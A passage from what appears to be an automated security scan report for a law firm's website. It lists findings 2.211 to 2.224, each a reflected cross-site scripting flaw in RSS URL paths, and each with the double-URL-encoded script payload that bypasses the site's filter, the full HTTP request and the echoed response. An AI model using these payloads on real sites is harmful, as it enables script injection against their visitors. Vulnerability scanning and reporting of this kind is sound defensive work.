This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rssab6ad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3058a7872f/practices/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rssab6ad"><script>alert(1)</script>3058a7872f/practices/Professional_Liability/rss.xml" value="">
...[SNIP]...

2.211. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13 was submitted in the REST URL parameter 2. This input was echoed as b635c"><script>alert(1)</script>bb61d6adb13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesb635c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb61d6adb13/Professional_Liability/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesb635c"><script>alert(1)</script>bb61d6adb13/Professional_Liability/rss.xml" value="">
...[SNIP]...

2.212. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf was submitted in the REST URL parameter 3. This input was echoed as 7b62f"><script>alert(1)</script>209c75ecebf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Professional_Liability7b62f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e209c75ecebf/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Professional_Liability7b62f"><script>alert(1)</script>209c75ecebf/rss.xml" value="">
...[SNIP]...

2.213. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Professional_Liability/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 was submitted in the REST URL parameter 4. This input was echoed as a3cc2"><script>alert(1)</script>842ba8b7f27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Professional_Liability/rss.xmla3cc2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e842ba8b7f27 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Professional_Liability/rss.xmla3cc2"><script>alert(1)</script>842ba8b7f27" value="">
...[SNIP]...

2.214. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7 was submitted in the REST URL parameter 1. This input was echoed as 43538"><script>alert(1)</script>239e5feec7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss43538%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e239e5feec7/practices/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss43538"><script>alert(1)</script>239e5feec7/practices/Public_Policy/rss.xml" value="">
...[SNIP]...

2.215. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80 was submitted in the REST URL parameter 2. This input was echoed as 95bab"><script>alert(1)</script>4f44ea70a80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices95bab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f44ea70a80/Public_Policy/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices95bab"><script>alert(1)</script>4f44ea70a80/Public_Policy/rss.xml" value="">
...[SNIP]...

2.216. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123 was submitted in the REST URL parameter 3. This input was echoed as bf26f"><script>alert(1)</script>e7d3032f123 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Public_Policybf26f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7d3032f123/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Public_Policybf26f"><script>alert(1)</script>e7d3032f123/rss.xml" value="">
...[SNIP]...

2.217. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Public_Policy/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 was submitted in the REST URL parameter 4. This input was echoed as cc78d"><script>alert(1)</script>35e1d1edf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Public_Policy/rss.xmlcc78d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35e1d1edf9 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Public_Policy/rss.xmlcc78d"><script>alert(1)</script>35e1d1edf9" value="">
...[SNIP]...

2.218. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202 was submitted in the REST URL parameter 1. This input was echoed as 8e1f4"><script>alert(1)</script>0a2d2f96202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss8e1f4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0a2d2f96202/practices/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss8e1f4"><script>alert(1)</script>0a2d2f96202/practices/White_Collar_Defense/rss.xml" value="">
...[SNIP]...

2.219. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4 was submitted in the REST URL parameter 2. This input was echoed as 68e4a"><script>alert(1)</script>dceb9945ee4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices68e4a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edceb9945ee4/White_Collar_Defense/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices68e4a"><script>alert(1)</script>dceb9945ee4/White_Collar_Defense/rss.xml" value="">
...[SNIP]...

2.220. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4 was submitted in the REST URL parameter 3. This input was echoed as 74b35"><script>alert(1)</script>3123ddbb2f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/White_Collar_Defense74b35%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3123ddbb2f4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/White_Collar_Defense74b35"><script>alert(1)</script>3123ddbb2f4/rss.xml" value="">
...[SNIP]...

2.221. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/White_Collar_Defense/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 was submitted in the REST URL parameter 4. This input was echoed as b3f91"><script>alert(1)</script>069fcdb3970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/White_Collar_Defense/rss.xmlb3f91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e069fcdb3970 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/White_Collar_Defense/rss.xmlb3f91"><script>alert(1)</script>069fcdb3970" value="">
...[SNIP]...

2.222. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad was submitted in the REST URL parameter 1. This input was echoed as 85268"><script>alert(1)</script>8395fd2c6ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss85268%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8395fd2c6ad/publications/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss85268"><script>alert(1)</script>8395fd2c6ad/publications/rss.xml" value="">
...[SNIP]...

2.223. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518 was submitted in the REST URL parameter 2. This input was echoed as 438f3"><script>alert(1)</script>2ac3b841518 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/publications438f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ac3b841518/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/publications438f3"><script>alert(1)</script>2ac3b841518/rss.xml" value="">
...[SNIP]...

2.224. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/publications/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 was submitted in the REST URL parameter 3. This input was echoed as d7207"><script>alert(1)</script>5a1738ffeb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/publications/rss.xmld7207%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5a1738ffeb4 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
